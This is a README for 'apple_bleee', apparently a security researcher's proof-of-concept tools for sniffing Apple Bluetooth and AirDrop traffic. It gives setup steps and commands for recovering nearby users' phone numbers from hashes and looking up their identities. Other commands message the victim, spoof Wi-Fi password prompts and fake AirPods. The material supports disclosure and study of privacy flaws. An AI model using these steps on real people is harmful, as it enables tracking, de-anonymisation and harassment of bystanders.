These scripts are experimental PoCs that show what an attacker get from Apple devices if they sniff Bluetooth traffic.
This project is created only for educational purposes and cannot be used for
law violation or personal gain.
The author of this project is not responsible for any possible harm caused by the materials of this project
To use these scripts you will need a Bluetooth adapter for sending BLE
messages and Wi-Fi card supporting active monitor mode with frame injection for communication using AWDL
(airdrop). We recommend the Atheros AR9280 chip (IEEE 802.11n) we used to develop and test this code.
We have tested these PoCs on Kali Linux
# clone main repo
git clone https://github.com/hexway/apple_bleee.git && cd ./apple_blee
# install dependencies
sudo apt update && sudo apt install -y bluez libpcap-dev libev-dev libnl-3-dev libnl-genl-3-dev libnl-route-3-dev cmake libbluetooth-dev
sudo pip3 install -r requirements.txt
# clone and install owl for AWDL interface
git clone https://github.com/seemoo-lab/owl.git && cd ./owl && git submodule update --init && mkdir build && cd build && cmake .. && make && sudo make install && cd ../..
Before using the tool, check that your Bluetooth adapter is connected
hcitool dev
Devices:
hci0 00:1A:7D:DA:71:13
Script: ble_read_state.py
This script sniffs BLE
traffic and displays status messages from Apple devices.
Moreover, the tool detects requests for password sharing from Apple devices. In these packets, we can get first 3 bytes of sha256(phone_number) and could try to guess the original phone number using prepared tables with phone hash values.
python3 ble_read_state.py -h
usage: ble_read_state.py [-h] [-c] [-n] [-r] [-l] [-s] [-m] [-a] [-t TTL]
Apple bleee. Apple device sniffer
---chipik
optional arguments:
-h, --help show this help message and exit
-c, --check_hash Get phone number by hash
-n, --check_phone Get user info by phone number (TrueCaller/etc)
-r, --check_region Get phone number region info
-l, --check_hlr Get phone number info by HRL request (hlrlookup.com)
-s, --ssid Get SSID from requests
-m, --message Send iMessage to the victim
-a, --airdrop Get info from AWDL
-t TTL, --ttl TTL ttl
For monitoring you can just run the script without any parameters
sudo python3 ble_read_state.py
press Ctrl+q
to exit
If you want to get phone numbers from a wifi password request, you have to prepare hashtable (please find scripts below), setup a web server and specify base_url
inside this script and run it with -c
parameter
sudo python3 ble_read_state.py -с
Video demo (click):
Script: airdrop_leak.py
This script allows to get mobile phone number of any user who will try to send file via AirDrop
For this script, we'll need AWDL
interface:
# set wifi card to monitor mode and run owl
sudo iwconfig wlan0 mode monitor && sudo ip link set wlan0 up && sudo owl -i wlan0 -N &
Now, you can run the script
python3 airdrop_leak.py -h
usage: airdrop_leak.py [-h] [-c] [-n] [-m]
Apple Airdrop phone number catcher
---chipik
optional arguments:
-h, --help show this help message and exit
-c, --check_hash Get phone number by hash
-n, --check_phone Get user info by phone number (TrueCaller/etc)
-m, --message Send iMessage to the victim
With no params, the script just displays phone hash and ipv6 address of the sender
sudo python3 airdrop_leak.py
Video demo (click):
Script: adv_wifi.py
This script sends BLE
messages with WiFi password sharing request. This PoC shows that an attacker can trigger pop up message on target device if he/she knows any phone/email that exist on victim's device
python3 adv_wifi.py -h
usage: adv_wifi.py [-h] [-p PHONE] [-e EMAIL] [-a APPLEID] -s SSID
[-i INTERVAL]
Wifi pwd sharing spoofing PoC
---chipik
optional arguments:
-h, --help show this help message and exit
-p PHONE, --phone PHONE
Phone number (example: 39217XXX514)
-e EMAIL, --email EMAIL
Email address (example: test@test.com)
-a APPLEID, --appleid APPLEID
Email address (example: test@icloud.com)
-s SSID, --ssid SSID Wi-Fi SSID (example: test)
-i INTERVAL, --interval INTERVAL
Advertising interval
For a wifi password request, we'll need to specify any contact(email/phone) that exists in a victim's contacts and the SSID of a wifi network that victim knows.
sudo python3 adv_wifi.py -e pr@hexway.io -s hexway
Video demo (click):
Script: adv_airpods.py
This script mimics airpods by sending BLE
messages
python3 adv_airpods.py -h
usage: adv_airpods.py [-h] [-i INTERVAL] [-r]
AirPods advertise spoofing PoC
---chipik
optional arguments:
-h, --help show this help message and exit
-i INTERVAL, --interval INTERVAL
Advertising interval
-r, --random send random charge values
Let's send BLE
messages with random charge values for headphones
sudo python3 adv_airpods.py -r
Video demo (click):
Script: hash2phone
You can use this script to create pre-calculated table with mobile phone numbers hashes
Please find details here